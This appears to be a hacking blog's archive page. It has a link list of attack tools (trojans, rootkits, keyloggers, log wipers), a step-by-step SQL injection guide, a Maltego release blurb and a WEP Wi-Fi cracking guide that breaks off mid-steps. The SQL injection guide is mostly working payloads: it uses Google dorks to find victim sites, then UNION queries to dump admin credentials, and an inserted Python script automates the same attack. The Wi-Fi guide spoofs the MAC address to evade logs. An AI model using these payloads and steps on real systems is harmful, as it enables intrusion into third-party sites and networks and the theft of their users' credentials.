Tuesday, August 11, 2015

Hacking Tools and useful information



A totally HUGE security archive http://neworder.box.sk/
THE best security forums http://www.security-forums.com/
Current and archived exploits http://www.securiteam.com/exploits/
'Underground' search engine http://www.warez.com/
Default logins for all sorts of devices http://www.governmentsecurity.org
One of the top mainstream security sites http://www.securityfocus.com/
TESO Computer security http://teso.scene.at/
Asian security group, lots of advisories http://www.shadowpenguin.org/
w00w00 Security development http://www.w00w00.org/
USSR a strong security group http://www.ussrback.com/
Good all around security site http://www.packetstormsecurity.nl
Exploits, backdoors, Trojans and more http://www.tlsecurity.net
SANS Security Institute with articles on EVERYTHING http://www.sans.org/
A Fairly immense WWW security FAQ http://www.w3.org/Security/Faq/
Computer Security Encyclopedia http://www.itsecurity.com/
Java Security information http://java.sun.com/security/
Help Net Security http://www.net-security.org/
Security Search Engine http://searchsecurity.techtarget.com/
Free BSD security information http://www.freebsd.org/security/
Netscape security information http://home.netscape.com/security/
Linux security community centre http://www.linuxsecurity.com/
Dutch Security Information Network http://www.dsinet.org/
Network Security Library http://secinf.net/
Infamous happy hacker http://www.happyhacker.org/
A once great site from a white hat hacker http://www.antionline.com/
Infosec papers and articles http://www.infosecwriters.com/
Security/privacy/crypto software archive http://www.wiretapped.net/
ISB - Info Sec Bible http://www.securityflaw.com/bible
Security tools http://foundstone.com/
http://securitystats.com

Privacy and Anonymity

All about privacy http://www.privacy.net
Anonymity, privacy and security http://www.stack.nl/~galactus/remailers/
Free, anonymous web surfing http://www.anonymizer.com/
IDSecure service http://www.idzap.com/
News, information and action http://www.privacy.org/
Sam Spade Tools http://www.samspade.org/t/
International PGP homepage http://www.pgpi.org
Encryptable web-mail http://www.hushmail.com/
Anonymity software http://www.skuz.net/potatoware/
REALLY delete your data http://www.cs.auckland.ac.nz/~pgut001/pubs/
Anonymous access http://www.safeproxy.org/
Web privacy http://www.rewebber.de/
A list of web anonymisers http://mikhed.narod.ru/


Cryptography & Encryption

All about RSA http://www.rsasecurity.com/
Cryptography Archives http://www.kremlinencrypt.com/
Cryptography links http://cryptography.org/freecryp.htm
Cryptography Info http://world.std.com/~franl/crypto/
DriveCrypt http://www.e4m.net/
CCIPS http://www.cybercrime.gov/crypto.html
Cryptography resource http://www.crypto.com/
Bruce Schneier's operation http://www.counterpane.com/
Huge Crypto archive http://www.cryptome.org
A list of Crypto links http://www.security-forums.com/crypto


Source: http://www.darknet.org.uk/

Viruses /Trojans & Firewalls
Trojan archive http://packetstormsecurity.nl/trojans/
Up to date Trojan archive http://www.trojanforge.net/
Fearless, everything Trojan http://www.areyoufearless.com/
A good archive with info on each one http://www.dark-e.com
(I'm a moron)'s official Home Page http://www.(I'm a moron).net/
The BO2k project http://bo2k.sourceforge.net/
Another comprehensive Trojan archive http://www.tlsecurity.net/amt.htm
Home of BackOrifice http://www.cultdeadcow.com/
Huge Trojan removal database http://www.anti-trojan.org/
Excellent Anti-Viral software and Virii Database http://www.sophos.com/
Mcafee's Searchable Virus Information Library http://vil.mcafee.com/
Firewall Guide http://www.firewallguide.com/
Virus Writing
http://vx.netlux.org/lib/static/vdat/tutorial.htm

Nice find Strader
Firewall FAQ http://www.interhack.net/pubs/fwfaq/
Firewall How To http://www.grennan.com/Firewall-HOWTO.html
Squid http://www.squid-cache.org/
Excellent virus news and info http://www.antivirus-online.de/english/
The ULTIMATE IPTables resource http://www.linuxguruz.org/iptables/



Programming

PHP IDE http://www.phpide.de/
Scripts, Source and Books http://www.scriptsearch.com/
Java & Internet Glossary http://www.mindprod.com/jgloss.html
Java homepage http://java.sun.com/
Absolute Java FAQ http://www.javafaq.nu/
Thinking in Java http://www.mindview.net/Books/TIJ/
JavaScript Resource http://www.javascript.com
JavaScripts,tutorials & references http://javascript.internet.com/
MySQL home http://www.mysql.com
PostgreSQL home http://www.postgresql.org/
PHP home page http://www.programmersheaven.com/
PHP from hotscripts http://www.hotscripts.com/PHP/
PHP resource index http://php.resourceindex.com/
PHP FAQ's http://www.faqts.com/
PHP Developer resources http://www.phpbuilder.com/
Building dynamic sites with PHP http://www.phpwizard.net
PHP Developer network http://www.evilwalrus.com/
PHP Tutorials and more http://www.thescripts.com/serversidescripting/php
PHP Resource list http://www.security-forums.com/forum/php
ASPTear http://www.alphasierrapapa.com/IisD...nents/AspTear/
ASP Codes and techniques http://www.asptoday.com/
ASP, HTML, SQL and more http://www.w3schools.com/
Think ASP think... http://www.4guysfromrolla.com/
ASP 101 http://www.asp101.com/
ASP developers site http://haneng.com/
PERL Archive http://www.perlarchive.com/
PERL tutorials http://www.perlmonks.org/index.pl?node=Tutorials
Old school PERL programming http://www.cgi101.com/
Windows programming tools http://www.programmerstools.org/
Python homepage http://www.python.org/
Object Oriented Programming http://www.oopweb.com/
XML 101 http://www.xml101.com
Dev-X XML zone http://www.devx.com/xml/
Programmers Heaven http://www.programmersheaven.com/
Loads of tutorials http://www.echoecho.com
Plenty of Web Development scripts http://www.hotscripts.com
Code for everything http://www.planet-source-code.com/
The definitive Assembly resource http://webster.cs.ucr.edu/ASM
C Course http://www.strath.ac.uk/IT/Docs/Ccourse/
Another good C course http://www.eskimo.com/~scs/cclass/notes/top.html
'Legal' Hacking

Zebulun http://www.cyberarmy.com/zebulun/
Hack me http://loginmatrix.com/hackme/
Try2Hack http://www.try2hack.nl/
Hack3r/Roothack http://roothack.org/
Pull The Plug http://www.pulltheplug.com/

News Groups

A great source of information, discussion and answers to questions, depending on how you put them.

alt.hacking
alt.binaries.hacking.beginner
alt.computer.security
alt.security
alt.os.security
alt.security.pgp
alt.security.pgp.patches
comp.os.linux.security
comp.os.ms-windows.nt.admin.security
comp.security.unix
comp.security.pgp.backdoors
microsoft.public.security
microsoft.public.sqlserver.security
microsoft.public.win2000.security



Tools

THE ultimate port scanner nmap.
The one and only NT password cracker L0phtcrack.
Get the latest version of john the ripper.
Windows process listener Inzider.
The best packet assembler/analyzer hping.
Hackers swiss army knife netcat.
A tool for network monitoring and data acquisition TCPDump.
The ONLY packet sniffer Ethereal.
An active reconnaissance network security tool Firewalk.
Grep your network traffic NGrep.
NIDS tester from NIDSbench fragrouter.
The best OS fingerprinter Xprobe.
Port mapper fport.
File Integrity checker Tripwire.
Check for rootkits chkrootkit.
OSS intrusion detection Snort.
Security Scanner Nessus.
TCP/IP Toolkit Paketto.


Nice find Strader.

Hackers Manifesto
http://www.infowar.com/forums/showthread.p...=&threadid=1162

"don't do anything illegal"

Practice:
http://www.scifi.pages.at/hackits/
(Thanks newbie)

http://www.hackerslab.org/eorg/
(thanks newbie)

http://www.learntohack.org/
(thanks newbie)

http://neworder.box.sk/codebox.links.php?key=36581
(Thanks Net Buster)

http://www.hackthissite.org/
(thanks 55)

Programs, applications and other needed tools

Browsers
Mozilla Firefox 9.1
http://www.mozilla.org/products/firefox/
Opera
http://www.opera.com/
Netscape 7.1
http://channels.netscape.com/ns/browsers/download.jsp

Free anti-virus programs
Avast
http://www.avast.com/
AVG
http://www.grisoft.com/us/us_dwnl_free.php
Free antivirus listing page
http://www.freebyte.com/antivirus/

Anti-Trojan applications
http://www.emsisoft.com/en/software/free/

Free firewalls
Zone labs
http://www.zonelabs.com/store/conte...reeDownload.jsp
Sygate
http://smb.sygate.com/products/spf_standard.htm
Outpost
http://www.agnitum.com/download/
Kerio
http://www.kerio.com/us/kpf_download.html


Test sites for firewall security
Pcflank
http://www.pcflank.com/
Gibson Research Corporation
http://www.grc.com/default.htm


Misc. sites that have been posted over the years
How to read netstat -an
http://www.geocities.com/merijn_bel.../netstatan.html
Dshield Distributed Intrusion Detection System
http://www.dshield.org/index.php
Hackers watch
http://www.hackerwatch.org/
TCP/ IP Ports list
http://www.chebucto.ns.ca/~rakerman/port-table.html
Network Tools
http://lists.gpick.com/pages/Network_Tools.htm
Hacking text files (older stuff but still useful)
http://www.textfiles.com/hacking/INTERNET/
Beta News
http://www.betanews.com/
GIF works
http://www.gifworks.com/
Secunia Security pages virus alerts and such
http://secunia.com/multiple_browse...ty_test/

Anti-spyware apps
Spyware blaster
http://www.javacoolsoftware.com/
Spybot S&D
http://www.pcworld.com/downloads/fi...id,22262,00.asp
Spyware guard
http://www.javacoolsoftware.com/spywareguard.html
Ad-Aware
http://www.lavasoftusa.com/software/adaware/



Here are some tools posted by my friend Splabster (thank you for taking the time to type up those tools):



General System & Network Probing:

Sam Spade http://www.samspade.org/ssw
Online tools http://www.network-tools.com
Online tool http://visualroute.visualware.com
Online tool http://www.norid.no/domenenavnbaser/domreg-alpha.html
Nmap http://www.nmap.org
Scanline http://www.foundstone.com
SuperScan http://www.foundstone.com
Icmpenum http://razor.bindview.com/tools/des...num_readme.html
Snscan http://www.foundstone.com
Ethereal http://www.ethereal.com
Ettercap http://ettercap.sourceforge.net
Xprobe2 http://www.sys-security.com/html/projects/X.html
Hping2 http://www.hping.org/
SQLping http://www.sqlsecurity.com/scripts.asp
Amap http://www.thc.org/releases.php
Tcp Traceroute http://michael.toren.net/code/tcptraceroute
VisualRoute http://www.visualware.com/visualroute/index.html

Enumerating & Compromising Windows

Netcat http://www.atstake.com/research/tools/index.html
Zebedee http://www.winton.org.uk/sebedee/
Desproxy http://desproxy.courceforge.net/
Winfo http://ntsecurity.nu/toolbox/winfo
enum http://razor.bindview.com/tools/des...num_readme.html
Ldp (LDAP query tool, available on the Windows 2000 Server CD-ROM)
DumpSec http://www.somarsoft.com/
Userdump http://www.hammerofgod.com/download.htm
NTFSdos http://www.sysinternals.com/ntw2k/freeware/NTFDOS.shtml
Chntpw http://home.eunet.no/~pnordahl/ntpasswd/
PWDump3 http://www.polivec.com/pwdump3.html
Lsadump2 http://razor.bindview.com/tools/index.shtml
PipeUpAdmin http://content.443.ch/pub/security/...peup/W2KPipeUp/
Psexec http://www.sysinternals.com/ntw2k/freeware/psexec.shtml
Ettercap (address above)
Brutus http://www.hoobie.net/brutus/index.html
Hydra http://www.thc.org/releases.php
John http://www.openwall.com/john
VNCcrack http://www.phenoelit.de/fr/tools.html
Cain & Abel http://www.oxid.it/projects.html
ClearLogs http://www.ntsecurity.nu/toolbox/
WinZapper http://www.ntsecurity.nu/toolbox/
SQLdict http://www.ntsecurity.nu/toolbox/sqldict

Enumerating & Compromising UNIX

Netcat
Zebedee
Desproxy
Ettercap
Xscan http://packetstormsecurity.nl/Exploit_Code_Archive/
Xwatchwin http://www.deter.com/unix/software/xwatchwin.tgz
Xkey http://www.deter.com/unix/software/xkey.c
Xspy http://www.deter.com/unix/software/xspy-1.0c.tgz
YPX http://www.deter.com/unix/software/ypx.sh.gz
Hunt http://lin.fsid.cvut.cz/~kra/index.html#HUNT
John
Brutus
Hydra
VNCcrack
SQLdict
Zap3 http://packetstormsecurity.nl/UNIX/...ion/log-wipers/

Enumerating & Compromising Novell

Pandora http://www.nmrc.org/project/pandora/index.html
On-site Admin http://www.environmental-center.com/freeware/onsite.htm
NCPQuery http://razor.bindview.com/tools/index.shtml

Enumerating & Compromising Wireless

Netstumbler http://www.netstumbler.com
Kismet http://www.kismetwireless.net/download.shtml
kisMac (for mac users) http://www.binaervarianz.de/projekt...ac/download.php
Airsnort http://airsnort.shmoo.com/
Airtraf http://www.elixar.com/index.html
SMAC http://www.klcconsulting.net/smac
Accessories http://www.fab-corp.com

General System & Network Vulnerability Checking

Nessus http://www.nessus.org
SARA http://www-arc.com/products.shtml
Nikto http://www.cirt.net/code/nikto.shtml

System Forensics Tools

Vision http://www.foundstone.com/knowledge...esc/vision.html
ListDLLs http://www.sysinternals.com/ntw2k/f.../listdlls.shtml
Process Explorer http://www.sysinternals.com/ntw2k/f...e/procexp.shtml
Coroner's Toolkit http://porcupine.org/forensics/tct.html
LADS http://www.sysinternals.com/ntw2k/f.../listdlls.shtml
Chkrootkit http://www.chkrootkit.org/
WinHex http://www.winhex.com/winhex/index-m.html
Active @ Undelete http://www.active-undelete.com/

Web Hacking tools

Black Widow http://www.softbytelabs.com/Frames.html
Web Sleuth http://sandsprite.com/Sleuth
Wfetch http://support.microsoft.com/defaul...B;en-us;q284285
Tsql http://www.aspalliance.com/mtgal/source_code/tsql.exe
Spike Proxy http://www.immunitysec.com/spike.html

Remote Command Shell/Remote Access Trojans/Rootkits

(I'm a moron) Trojan http://(I'm a moron).net/
Barok active Trojan http://www.thenewbiesarea.com/trojans.shtml
AckCmd backdoor http://ntsecurity.ni/toolbox/
Tini backdoor http://ntsecurity.ni/toolbox/
Psexec r-shell http://www.sysinternals.com/ntw2k/freeware/psexec.shtml
Rwwwshell r-shell http://www.thc.org/releases/rwwwshell-2.0.pl.gz
LRK5 rootkit http://www.hackersplayground.org/tools.html
Knark 2.4 rootkit http://www.hackersplayground.org/tools.html

Miscellaneous Tools

Fragrouter http://packetstorm.widexs.nl/UNIX/I.../nidsbench.html
Stunnel http://www.stunnel.org
WinRelay http://www.ntsecurity.nu/toolbox/
Fpipe http://www.foundstone.com/resources/freetools.htm
Tight VNC http://www.tightvnc.com
FileGateway http://www.steelbytes.com
Remote Anything http://remote-anything.com/en/ra_index.htm
TinyWeb http://www.ritlabs.com/tinyweb/index.html
IKS 200 key logger http://www.amecisco.com/index.htm
KLogger http://www.ntsecurity.nu/toolbox/
ShowWin http://www.foundstone.com/knowledge/free_tools.html
KEYhatcher http://www.keykatcher.com/howit.htm
Hex Editors http://www.expertcomsoft.com
http://www.winhex.com/winhex/index-m.html

Secure hard disk wiping and deletion
http://www.heidi.ie
http://www.jetico.com
http://www.winhex.com/winhex/index-m.html
Trinux http://trinux.sourceforge.net/
Silk Rope 2K http://www.hackersplayground.org/tools.html
CMOS killer http://www.hackersplayground.org/tools.html
LDAP Browser http://www.softerra.com/products/ldabrowser.php
QTODBC http://gpoulose.home.att.net/Tools/QTADO40_sr.exe

Host Lockdown/Protection/Assessment Tools

Bastille http://www.bastille-linux.org
ipchains http://www.linuxplanet.com/linuxpla...torials/2100/3/
Apache Shell http://ftp.porcupine.org/pub/security/index.html
Titan http://www.fish.com/titan
Tara http://www-arc.com/products.shtml
Tcpwrappers http://www.linuxsecurity.com/docs/colsfaq.html#4.5
URLscan http://www.microsoft.com/technet/security/tools/
IISLockdown http://www.microsoft.com/technet/security/tools/
Tripwire http://www.tripwire.com/
HFNETchk http://www.microsoft.com/technet/security/tools/
MS SQL Lockdown Script http://www.sqlsecurity.com/DesktopD...ndex=4&tabid=12
UNIX/Windows/router assessment tools http://www.cisecurity.org/
Secure Cisco Router Template http://www.cymru.com/Documents/secure-ios-template.html
Secure Cisco Switch Template
http://www.qorbit.net/documents/cat...re-template.pdf
Snort http://www.snort.org
Swatch http://swatch.sourceforge.net
Secure Remote Password http://srp.stanford.edu/
Software Code Review links https://sardonix.org/auditing_Resources.html
Sawmill http://www.sawmill.net/features.html

Wednesday, August 15, 2012

Hacking a website using SQL Injection - step by step guide

Before we look at what SQL injection is, we should know what SQL and a database are.

Database:

A database is a collection of data. From a website's point of view, the database stores user IDs, passwords, page content and more.



Some common database servers are:

* MySQL (open source)
* MSSQL
* MS Access
* Oracle
* PostgreSQL (open source)
* SQLite



SQL:

SQL stands for Structured Query Language. We communicate with the database by sending it SQL queries; because we are querying the database, it is called a query language.

Definition from SQL: The Complete Reference:


SQL is a tool for organizing, managing, and retrieving data stored by a computer database. The name "SQL" is an abbreviation for Structured Query Language. For historical reasons, SQL is usually pronounced "sequel," but the alternate pronunciation "S.Q.L." is also used. As the name implies, SQL is a computer language that you use to interact with a database. In fact, SQL works with one specific type of database, called a relational database.

Simple basic SQL queries:

select * from table_name :

returns every column of every row of the table (the column names come back as the header of the result).
For eg:
select * from users;

insert into table_name(column_names,...) values(corresponding values for the columns):

inserts a new row into the table.
For eg:
insert into users(username,userid) values("BreakTheSec","break");

I will give more details and queries in my next thread about SQL queries.


What is SQL Injection?

SQL injection is one of the most common web attacks today. It lets an unauthorized person run SQL of their own choosing against the website's database, and from there read, and often change, whatever the database holds.

What can an attacker do?

* Bypass logins
* Read data that was meant to stay secret
* Modify the contents of the website
* Shut down the MySQL server

Now let's dive into the real procedure for SQL injection. Follow these steps.

Step 1: Finding a Vulnerable Website:

Our best partner for finding SQL injection is Google. We can find vulnerable (hackable) websites using a Google dork list: a "dork" is a search string that uses Google's search operators to find pages of a particular shape. There are many such operators; here we use the "inurl:" operator to find pages whose URL takes a numeric parameter.

Some Examples:

inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=

Here is a huge list of Google dorks:

http://www.ziddu.com/download/13161874/A...t.zip.html


How to use them?

Copy one of the above strings, paste it into the Google search box and hit enter.
You get a list of websites.
Each one has to be visited and checked for the vulnerability, so start with the first.


Note: to test one particular website, restrict the dork to that site:

site:www.victimsite.com dork_list_commands
for eg:

site:www.victimsite.com inurl:index.php?id=
Step 2: Checking the Vulnerability:
Now check whether the site is vulnerable. Add a single quote (') to the end of the URL, with no space between the number and the quote, and hit enter.

For eg:


http://www.victimsite.com/index.php?id=2'
If the page stays the same, says "page not found" or shows some other normal page, no error is visible. That does not prove the site is safe (the application may hide database errors, which is the "blind" case and needs other techniques), but for this walkthrough we move on to the next site.

If it shows an error related to the SQL query, it is vulnerable. Cheers!

For eg:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

Step 3: Finding the Number of Columns:

Now that we have found a vulnerable website, the next step is to find how many columns the page's query selects (for a "select *" query that is the number of columns in the table).
For that, replace the single quote (') with an "order by n" clause (leave one space between the number and "order by").

Increase n from 1, 2, 3, 4, 5, 6, ... until you get an error like "Unknown column 'n' in 'order clause'". Sorting by a column position that does not exist is what produces the error.


For eg:


http://www.victimsite.com/index.php?id=2 order by 1
http://www.victimsite.com/index.php?id=2 order by 2

http://www.victimsite.com/index.php?id=2 order by 3

http://www.victimsite.com/index.php?id=2 order by 4
Change the number until you get the "unknown column" error.

If the error appears at the "x"th number, then the number of columns is x-1.


I mean:


http://www.victimsite.com/index.php?id=2 order by 1(noerror)
http://www.victimsite.com/index.php?id=2 order by 2(noerror)
http://www.victimsite.com/index.php?id=2 order by 3(noerror)
http://www.victimsite.com/index.php?id=2 order by 4(noerror)
http://www.victimsite.com/index.php?id=2 order by 5(noerror)
http://www.victimsite.com/index.php?id=2 order by 6(noerror)
http://www.victimsite.com/index.php?id=2 order by 7(noerror)
http://www.victimsite.com/index.php?id=2 order by 8(error)

 
So x=8, and the number of columns is x-1, i.e. 7.

Sometimes the above does not work, because whatever the original query has after the injected value (more conditions, a limit clause) breaks it. In that case add the comment marker "--" at the end of the statement so the rest of the query is ignored. Note that MySQL only treats "--" as a comment when it is followed by whitespace, so in a URL use "-- " (the browser sends the space as %20) or "--+"; "#" also works as a comment marker.

For eg:

http://www.victimsite.com/index.php?id=2 order by 1--

Step 4: Displaying the Vulnerable Columns:

Using "union select columns_sequence" we find which of the selected columns are actually printed on the page. Replace the "order by n" with this statement, and change the id value to a negative number (id=-2). That makes the original query match no row, so only our union row is displayed (on some websites it also works without changing the id).

Replace columns_sequence with the numbers from 1 to x-1 (the number of columns), separated by commas (,).


For eg:

if the number of columns is 7 ,then the query is as follow:


http://www.victimsite.com/index.php?id=-2 union select 1,2,3,4,5,6,7--

If the above method is not working then try this:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--


Some of the numbers will appear on the page (they are positions between 1 and the number of columns). Those are the columns the page displays, and therefore the places where we can put our own expressions.


In this example the numbers 3 and 7 appear on the page. Pick one of them; we take number 3.

Step 5: Finding the Version, Database and User

Now replace the 3 in the query with "version()":

For eg:


http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5,6,7--


It will show the MySQL version, for example 5.0.1 or 4.3.


Replace version() with database() and user() to find the current database name and the database user, respectively.


For eg:


http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7--


http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,user(),4,5,6,7--

If the above does not work, try this (unhex(hex(...)) forces the value to a string, which helps when the displayed column is not a text column):

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7--



Step 6: Finding the Table Names

If the version is 5 or above, follow these steps (MySQL 5.0 introduced information_schema, which lists every table and column in the server). Now we have to find the table names in the database. Replace the 3 with "group_concat(table_name)" and add "from information_schema.tables where table_schema=database()" at the end:

For eg:



http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--
Now it shows the list of table names in the current database. Find the table related to the admin or users.




Now select the "admin " table.


If the version is 4 (or something else without information_schema), you have to guess the table names (user, tbluser, admin, ...). SQL injection against version 4 is hard and tedious for that reason.


Step 7: Finding the Column Names

Now replace "group_concat(table_name)" with "group_concat(column_name)".

Replace "from information_schema.tables where table_schema=database()--" with "from information_schema.columns where table_name=mysqlchar--".

Now listen carefully: the table name has to be written without quotes, because many applications escape the quotes in the input (magic_quotes, addslashes). So we convert the table name to a MySQL CHAR() string (a hex literal such as 0x61646d696e for "admin" works just as well, since neither needs quotes) and put that in place of mysqlchar.


To get the CHAR() form of the table name:

First install the HackBar add-on:
https://addons.mozilla.org/en-US/firefox/addon/3899/

Then select SQL -> MySQL -> MysqlChar(). A small window opens; enter the table name you found (I am going to use the admin table) and click OK. You can now see CHAR(numbers separated by commas) in the HackBar toolbar.

Copy it and paste it into the URL in place of "mysqlchar".

For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--

Now it shows the list of column names, for example:
admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pass,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password, etc.


Now replace group_concat(column_name) with group_concat(columnname,0x3a,anothercolumnname).

columnname and anothercolumnname are two of the listed column names. 0x3a is a hex literal for ":", so the two values come back separated by a colon.

Then replace "from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)" with "from table_name", using the real table name:


For eg:


http://www.victimsite.com/index.php?id=-2
and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin--

Sometimes it says the column is not found; then try other column names.

Now it shows the usernames and passwords (often as hashes rather than plaintext, in which case they still have to be cracked).

Enjoy! Cheers!

If the website has members, then jackpot: you have the list of usernames and passwords.

Sometimes you get the email addresses too; then you have the goose that lays the golden eggs.
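The whole procedure from step 2 to step 7, as an added worked example that is not part of the original post. It runs the same sequence (quote test, "order by" probing, union marker row, then version, table list, column list and credential dump) against a deliberately vulnerable page backed by an in-memory SQLite database, and then shows that the parameterised version of the same page gives the attacker nothing. SQLite stands in for MySQL, so sqlite_master and pragma_table_info() play the role of information_schema, sqlite_version() replaces version(), and || with char(58) replaces group_concat(a,0x3a,b). The articles and admin tables, the hash stored in them, the page rendering and all function names are constructed for this demo.

```python
"""Added example, not code from the original post: the SQL injection
walkthrough run against a vulnerable page, then against its hardened form.
Assumption: an in-memory SQLite database stands in for MySQL."""
import re
import sqlite3

# Constructed sample data: a news site with an articles table behind the page
# and the admin table the attacker is after (the hash is a made-up value).
SCHEMA = """
CREATE TABLE articles(id INTEGER, slug TEXT, body TEXT, author TEXT,
                      created TEXT, views INTEGER, tags TEXT);
INSERT INTO articles VALUES
  (1, 'hello',  'First post', 'alice', '2012-08-15', 10, 'intro'),
  (2, 'second', 'More text',  'bob',   '2012-08-16',  3, 'news');
CREATE TABLE admin(admin_id INTEGER, admin_name TEXT, admin_password TEXT);
INSERT INTO admin VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
"""

def open_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db

def vulnerable_page(db, id_param):
    """index.php?id=... as the tutorial assumes it: the parameter is pasted
    into the SQL text and database errors are echoed into the page."""
    sql = "SELECT * FROM articles WHERE id=" + id_param
    try:
        rows = db.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return f"SQL error: {exc}"
    # The template prints only the 3rd and 7th columns (body and tags).
    return "".join(f"<article>{r[2]} [{r[6]}]</article>" for r in rows)

def hardened_page(db, id_param):
    """Same page with the value bound as a parameter instead of concatenated."""
    try:
        article_id = int(id_param)
    except ValueError:
        return "<p>bad id</p>"
    rows = db.execute("SELECT * FROM articles WHERE id=?", (article_id,)).fetchall()
    return "".join(f"<article>{r[2]} [{r[6]}]</article>" for r in rows)

DB = open_db()
def vuln_fetch(id_param): return vulnerable_page(DB, id_param)
def safe_fetch(id_param): return hardened_page(DB, id_param)

# --- attacker side: one function per step of the walkthrough ----------------

def looks_injectable(fetch):                       # step 2: the quote test
    return "SQL error" in fetch("2'")

def count_columns(fetch, limit=32):                # step 3: ORDER BY n
    for n in range(1, limit + 1):
        if "SQL error" in fetch(f"2 ORDER BY {n}--"):
            return n - 1                           # first failing n, minus one
    raise RuntimeError(f"no ORDER BY error up to {limit}")

def reflected_slots(fetch, ncols):                 # step 4: which numbers show
    markers = ",".join(str(i) for i in range(1, ncols + 1))
    out = fetch(f"-2 UNION SELECT {markers}--")
    return [i for i in range(1, ncols + 1) if re.search(rf"\b{i}\b", out)]

def extract(fetch, ncols, slot, expr, from_clause=""):   # steps 5 to 7
    """Put expr into the displayed slot, bracketed so it can be read back."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[slot - 1] = f"'[[' || ({expr}) || ']]'"
    out = fetch(f"-2 UNION SELECT {','.join(cols)} {from_clause}--")
    m = re.search(r"\[\[(.*?)\]\]", out)
    return m.group(1) if m else None

def mysql_char(name):
    """What HackBar's MysqlChar() builds: 'admin' -> CHAR(97, 100, 109, 105, 110)."""
    return "CHAR(" + ", ".join(str(ord(c)) for c in name) + ")"

def run_walkthrough(fetch):
    """Returns what the attacker learns, or None if the page is not injectable."""
    if not looks_injectable(fetch):
        return None
    n = count_columns(fetch)
    slot = reflected_slots(fetch, n)[0]
    return {
        "columns": n,
        "slot": slot,
        "version": extract(fetch, n, slot, "sqlite_version()"),
        "tables": extract(fetch, n, slot, "group_concat(name)",
                          "FROM sqlite_master WHERE type='table'"),
        "admin_columns": extract(fetch, n, slot, "group_concat(name)",
                                 "FROM pragma_table_info('admin')"),
        "credentials": extract(fetch, n, slot,
                               "group_concat(admin_name || char(58) || admin_password)",
                               "FROM admin"),
    }

if __name__ == "__main__":
    print(run_walkthrough(vuln_fetch))
    print(run_walkthrough(safe_fetch))             # None: nothing to inject into
```

Run it as a script to see the dictionary the attacker ends up with. Against hardened_page the quote test produces no SQL error, so looks_injectable is false and nothing downstream has anything to work with. Note that the fix is not filtering quotes, which is exactly what the CHAR() trick in step 7 routes around, but never letting the parameter become part of the SQL text at all.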

Step 8: Finding the Admin Panel:

Just try with url like:

http://www.victimsite.com/admin.php
http://www.victimsite.com/admin/
http://www.victimsite.com/admin.html
http://www.victimsite.com:2082/
etc.
With luck you will find the admin page with one of the above URLs, or try this list.
Here is the list of admin urls:

http://www.ziddu.com/download/13163866/A...t.zip.html


Note:

This is for educational purposes only. Reading about or discussing a thief's technique is not a crime, but using it is.

Friday, February 17, 2012

Maltego 3.1 Open source intelligence mining and visualization tool


Maltego – Open source intelligence mining and visualization tool


Although we do not make it a habit to announce third party releases, in Maltego’s case, we happily make an exception. Maltego 3.1 is the new flagship product from the guys at Paterva and offers a range of fantastic new features and enhancements to the already phenomenal product. If you haven’t tried Maltego, you don’t know what you are missing. Some of the new features include:
Completely new graph organisational abilities:
You now have the ability to organise the graph in terms of alignment, as well as setting the layout for specific segments of the graph or for the entire graph.
New views, including Bubble View, which lets users sort the information on their graph by relevance according to incoming links (how many different bits of information point into a node), outgoing links (how many different links point out from a node) or both.
Additionally, there is the new Interactive Organic layout, which improves the speed of graph rendering dramatically by only redrawing the parts of the graph that are updated. There is also the ability to lock entities in place in a graph to allow for a more human-structured format. Within the entities of the graph you can also merge entities, add notes and add attachments (either from the web or local), on top of the previous features of adding custom entity types and changing the link properties.
Lastly, the Investigate tab now lets users select all entities on a graph by bookmark or by entity type, as well as offering the previous searching capabilities.
Once the Paterva development team get their rest, we should be seeing a Maltego 3.1 CE edition surface... we will keep y'all updated once it does. Head down to the Paterva website now and see the awesomeness of Maltego!

Tuesday, September 20, 2011

Albertino KeyLogger Tutorial





Thursday, September 1, 2011

Beginners Guide To Hacking Wireless Networks







Hacking WEP Wi-Fi passwords: basic entry into a WEP-encrypted network


This tutorial explains everything in detail, so it is quite long. Enjoy.


1. Getting the right tools
This tutorial was written on BackTrack 3 (BT3), but download the latest release, BackTrack 4 (BT4).


Download BackTrack 4. It can be found here:


http://www.backtrack-linux.org/downloads/


I downloaded the DVD ISO and burned it to a DVD. Insert your BT4 DVD or USB drive and reboot your computer into BT4. I always load the 3rd boot option from the boot menu (VESA/KDE). You only have a few seconds before it auto-boots into the 1st option, so be ready. The 1st option boots too slowly or not at all, so always boot from the 2nd or 3rd. Experiment to see what works best for you.


2. Preparing your wireless card and choosing the target network


Once in BT4, click the tiny black box in the lower left corner to open a "Konsole" window. Now we must prepare your wireless card.
Type:


airmon-ng


You will see the name of your wireless interface (mine is named "ath0"). From here on, replace "ath0" with the name of yours. The commands below are for the madwifi driver, where ath0 is a virtual interface on top of the physical device wifi0; with other drivers the interface names differ.
Now type:


airmon-ng stop ath0


then type:


ifconfig wifi0 down


then:


macchanger --mac 00:11:22:33:44:55 wifi0


then:


airmon-ng start wifi0


What these steps did was spoof (fake) your MAC address, so that if your computer is noticed by someone while you are breaking in, their logs show the fake address and not your REAL one. Moving on...
Now it's time to discover some networks to break into.


Type:


airodump-ng ath0


Now you will see a list of wireless networks start to populate. Some will have a better signal than others; pick one with a decent signal, otherwise it will take forever to gather packets or you may not be able to crack it at all.
Once you see the network that you want to crack, do this:


hold down ctrl and type c


